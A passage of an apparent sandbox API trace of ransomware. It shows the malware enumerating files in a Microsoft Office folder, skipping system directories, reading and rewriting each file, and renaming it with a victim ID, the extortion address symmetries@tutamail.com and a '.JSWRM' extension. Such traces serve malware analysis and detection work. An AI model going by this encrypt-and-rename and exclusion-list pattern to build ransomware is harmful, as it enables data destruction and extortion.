Office\\root\\Office16\\PUBWIZ\\RES98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\res98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\RES98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\res98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.007] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23467797, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23467797, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23467797, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1effa, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="RESP98.POC", cAlternateFileName="")) returned 1 [0143.007] lstrcmpiW (lpString1="RESP98.POC", lpString2=".") returned 1 [0143.007] lstrcmpiW (lpString1="RESP98.POC", lpString2="..") returned 1 [0143.007] lstrcmpiW (lpString1="RESP98.POC", lpString2="...") returned 1 [0143.007] lstrcmpiW (lpString1="RESP98.POC", lpString2="windows") returned -1 [0143.007] lstrcmpiW (lpString1="RESP98.POC", lpString2="recovery") returned 1 [0143.007] lstrcmpiW (lpString1="RESP98.POC", lpString2="perflogs") returned 1 [0143.007] lstrcmpiW (lpString1="RESP98.POC", lpString2="documents and settings") returned 1 [0143.007] lstrcmpiW (lpString1="RESP98.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.007] lstrcmpiW (lpString1="RESP98.POC", lpString2="system volume information") returned -1 [0143.007] lstrcmpiW (lpString1="RESP98.POC", lpString2="msocache") returned 1 [0143.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESP98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESP98.POC", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RESP98.POC", lpUsedDefaultChar=0x0) returned 10 [0143.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESP98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESP98.POC", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RESP98.POC", lpUsedDefaultChar=0x0) returned 10 [0143.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.007] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\RESP98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\resp98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.008] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=126970) returned 1 [0143.008] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.008] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1eff0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x1eff0, lpOverlapped=0x0) returned 1 [0143.017] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.017] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1eff0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x1eff0, lpOverlapped=0x0) returned 1 [0143.017] CloseHandle (hObject=0x238) returned 1 [0143.017] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\RESP98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\resp98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\RESP98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\resp98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.019] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23467797, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23467797, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23467797, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="RESUME.DPV", cAlternateFileName="")) returned 1 [0143.019] lstrcmpiW (lpString1="RESUME.DPV", lpString2=".") returned 1 [0143.019] lstrcmpiW (lpString1="RESUME.DPV", lpString2="..") returned 1 [0143.019] lstrcmpiW (lpString1="RESUME.DPV", lpString2="...") returned 1 [0143.019] lstrcmpiW (lpString1="RESUME.DPV", lpString2="windows") returned -1 [0143.019] lstrcmpiW (lpString1="RESUME.DPV", lpString2="recovery") returned 1 [0143.019] lstrcmpiW (lpString1="RESUME.DPV", lpString2="perflogs") returned 1 [0143.019] lstrcmpiW (lpString1="RESUME.DPV", lpString2="documents and settings") returned 1 [0143.019] lstrcmpiW (lpString1="RESUME.DPV", lpString2="$RECYCLE.BIN") returned 1 [0143.019] lstrcmpiW (lpString1="RESUME.DPV", lpString2="system volume information") returned -1 [0143.019] lstrcmpiW (lpString1="RESUME.DPV", lpString2="msocache") returned 1 [0143.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESUME.DPV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESUME.DPV", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RESUME.DPV", lpUsedDefaultChar=0x0) returned 10 [0143.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESUME.DPV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESUME.DPV", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RESUME.DPV", lpUsedDefaultChar=0x0) returned 10 [0143.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.019] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\RESUME.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\resume.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.020] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11264) returned 1 [0143.020] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.020] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2c00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2c00, lpOverlapped=0x0) returned 1 [0143.273] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.273] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2c00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2c00, lpOverlapped=0x0) returned 1 [0143.273] CloseHandle (hObject=0x238) returned 1 [0143.273] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\RESUME.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\resume.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\RESUME.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\resume.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.275] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23467797, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23467797, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23467797, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x85a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="RESUME.XML", cAlternateFileName="")) returned 1 [0143.275] lstrcmpiW (lpString1="RESUME.XML", lpString2=".") returned 1 [0143.275] lstrcmpiW (lpString1="RESUME.XML", lpString2="..") returned 1 [0143.275] lstrcmpiW (lpString1="RESUME.XML", lpString2="...") returned 1 [0143.275] lstrcmpiW (lpString1="RESUME.XML", lpString2="windows") returned -1 [0143.275] lstrcmpiW (lpString1="RESUME.XML", lpString2="recovery") returned 1 [0143.276] lstrcmpiW (lpString1="RESUME.XML", lpString2="perflogs") returned 1 [0143.276] lstrcmpiW (lpString1="RESUME.XML", lpString2="documents and settings") returned 1 [0143.276] lstrcmpiW (lpString1="RESUME.XML", lpString2="$RECYCLE.BIN") returned 1 [0143.276] lstrcmpiW (lpString1="RESUME.XML", lpString2="system volume information") returned -1 [0143.276] lstrcmpiW (lpString1="RESUME.XML", lpString2="msocache") returned 1 [0143.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESUME.XML", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESUME.XML", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RESUME.XML", lpUsedDefaultChar=0x0) returned 10 [0143.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESUME.XML", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESUME.XML", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RESUME.XML", lpUsedDefaultChar=0x0) returned 10 [0143.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.276] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\RESUME.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\resume.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.277] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2138) returned 1 [0143.277] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.277] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x850, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x850, lpOverlapped=0x0) returned 1 [0143.279] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.279] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x850, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x850, lpOverlapped=0x0) returned 1 [0143.279] CloseHandle (hObject=0x238) returned 1 [0143.279] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\RESUME.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\resume.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\RESUME.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\resume.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.280] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x235000fc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x235000fc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2373c469, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2aa, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="RSPMECH.POC", cAlternateFileName="")) returned 1 [0143.281] lstrcmpiW (lpString1="RSPMECH.POC", lpString2=".") returned 1 [0143.281] lstrcmpiW (lpString1="RSPMECH.POC", lpString2="..") returned 1 [0143.281] lstrcmpiW (lpString1="RSPMECH.POC", lpString2="...") returned 1 [0143.281] lstrcmpiW (lpString1="RSPMECH.POC", lpString2="windows") returned -1 [0143.281] lstrcmpiW (lpString1="RSPMECH.POC", lpString2="recovery") returned 1 [0143.281] lstrcmpiW (lpString1="RSPMECH.POC", lpString2="perflogs") returned 1 [0143.281] lstrcmpiW (lpString1="RSPMECH.POC", lpString2="documents and settings") returned 1 [0143.281] lstrcmpiW (lpString1="RSPMECH.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.281] lstrcmpiW (lpString1="RSPMECH.POC", lpString2="system volume information") returned -1 [0143.281] lstrcmpiW (lpString1="RSPMECH.POC", lpString2="msocache") returned 1 [0143.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RSPMECH.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RSPMECH.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RSPMECH.POC", lpUsedDefaultChar=0x0) returned 11 [0143.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RSPMECH.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RSPMECH.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RSPMECH.POC", lpUsedDefaultChar=0x0) returned 11 [0143.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.281] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\RSPMECH.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\rspmech.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.282] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=682) returned 1 [0143.282] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.283] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x2a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x2a0, lpOverlapped=0x0) returned 1 [0143.283] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.283] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x2a0, lpOverlapped=0x0) returned 1 [0143.284] CloseHandle (hObject=0x238) returned 1 [0143.284] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\RSPMECH.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\rspmech.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\RSPMECH.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\rspmech.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.285] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x235000fc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x235000fc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23526361, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1075e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="SIDBAR98.POC", cAlternateFileName="")) returned 1 [0143.308] lstrcmpiW (lpString1="SIDBAR98.POC", lpString2=".") returned 1 [0143.308] lstrcmpiW (lpString1="SIDBAR98.POC", lpString2="..") returned 1 [0143.308] lstrcmpiW (lpString1="SIDBAR98.POC", lpString2="...") returned 1 [0143.308] lstrcmpiW (lpString1="SIDBAR98.POC", lpString2="windows") returned -1 [0143.308] lstrcmpiW (lpString1="SIDBAR98.POC", lpString2="recovery") returned 1 [0143.308] lstrcmpiW (lpString1="SIDBAR98.POC", lpString2="perflogs") returned 1 [0143.308] lstrcmpiW (lpString1="SIDBAR98.POC", lpString2="documents and settings") returned 1 [0143.308] lstrcmpiW (lpString1="SIDBAR98.POC", lpString2="$RECYCLE.BIN") returned 1 [0143.308] lstrcmpiW (lpString1="SIDBAR98.POC", lpString2="system volume information") returned -1 [0143.308] lstrcmpiW (lpString1="SIDBAR98.POC", lpString2="msocache") returned 1 [0143.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIDBAR98.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIDBAR98.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIDBAR98.POC", lpUsedDefaultChar=0x0) returned 12 [0143.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIDBAR98.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIDBAR98.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIDBAR98.POC", lpUsedDefaultChar=0x0) returned 12 [0143.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.309] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIDBAR98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sidbar98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0143.311] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=67422) returned 1 [0143.311] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.311] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x10750, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x10750, lpOverlapped=0x0) returned 1 [0143.316] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.317] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x10750, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x10750, lpOverlapped=0x0) returned 1 [0143.317] CloseHandle (hObject=0x238) returned 1 [0143.317] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIDBAR98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sidbar98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\SIDBAR98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\sidbar98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.319] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23598a6d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23598a6d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x237aeb7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4c4d9, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="SIDEBARBB.DPV", cAlternateFileName="SIDEBA~2.DPV")) returned 1 [0143.319] lstrcmpiW (lpString1="SIDEBARBB.DPV", lpString2=".") returned 1 [0143.319] lstrcmpiW (lpString1="SIDEBARBB.DPV", lpString2="..") returned 1 [0143.319] lstrcmpiW (lpString1="SIDEBARBB.DPV", lpString2="...") returned 1 [0143.319] lstrcmpiW (lpString1="SIDEBARBB.DPV", lpString2="windows") returned -1 [0143.319] lstrcmpiW (lpString1="SIDEBARBB.DPV", lpString2="recovery") returned 1 [0143.319] lstrcmpiW (lpString1="SIDEBARBB.DPV", lpString2="perflogs") returned 1 [0143.319] lstrcmpiW (lpString1="SIDEBARBB.DPV", lpString2="documents and settings") returned 1 [0143.319] lstrcmpiW (lpString1="SIDEBARBB.DPV", lpString2="$RECYCLE.BIN") returned 1 [0143.319] lstrcmpiW (lpString1="SIDEBARBB.DPV", lpString2="system volume information") returned -1 [0143.319] lstrcmpiW (lpString1="SIDEBARBB.DPV", lpString2="msocache") returned 1 [0143.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIDEBARBB.DPV", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0143.319] WideCharToMultiByte (in: 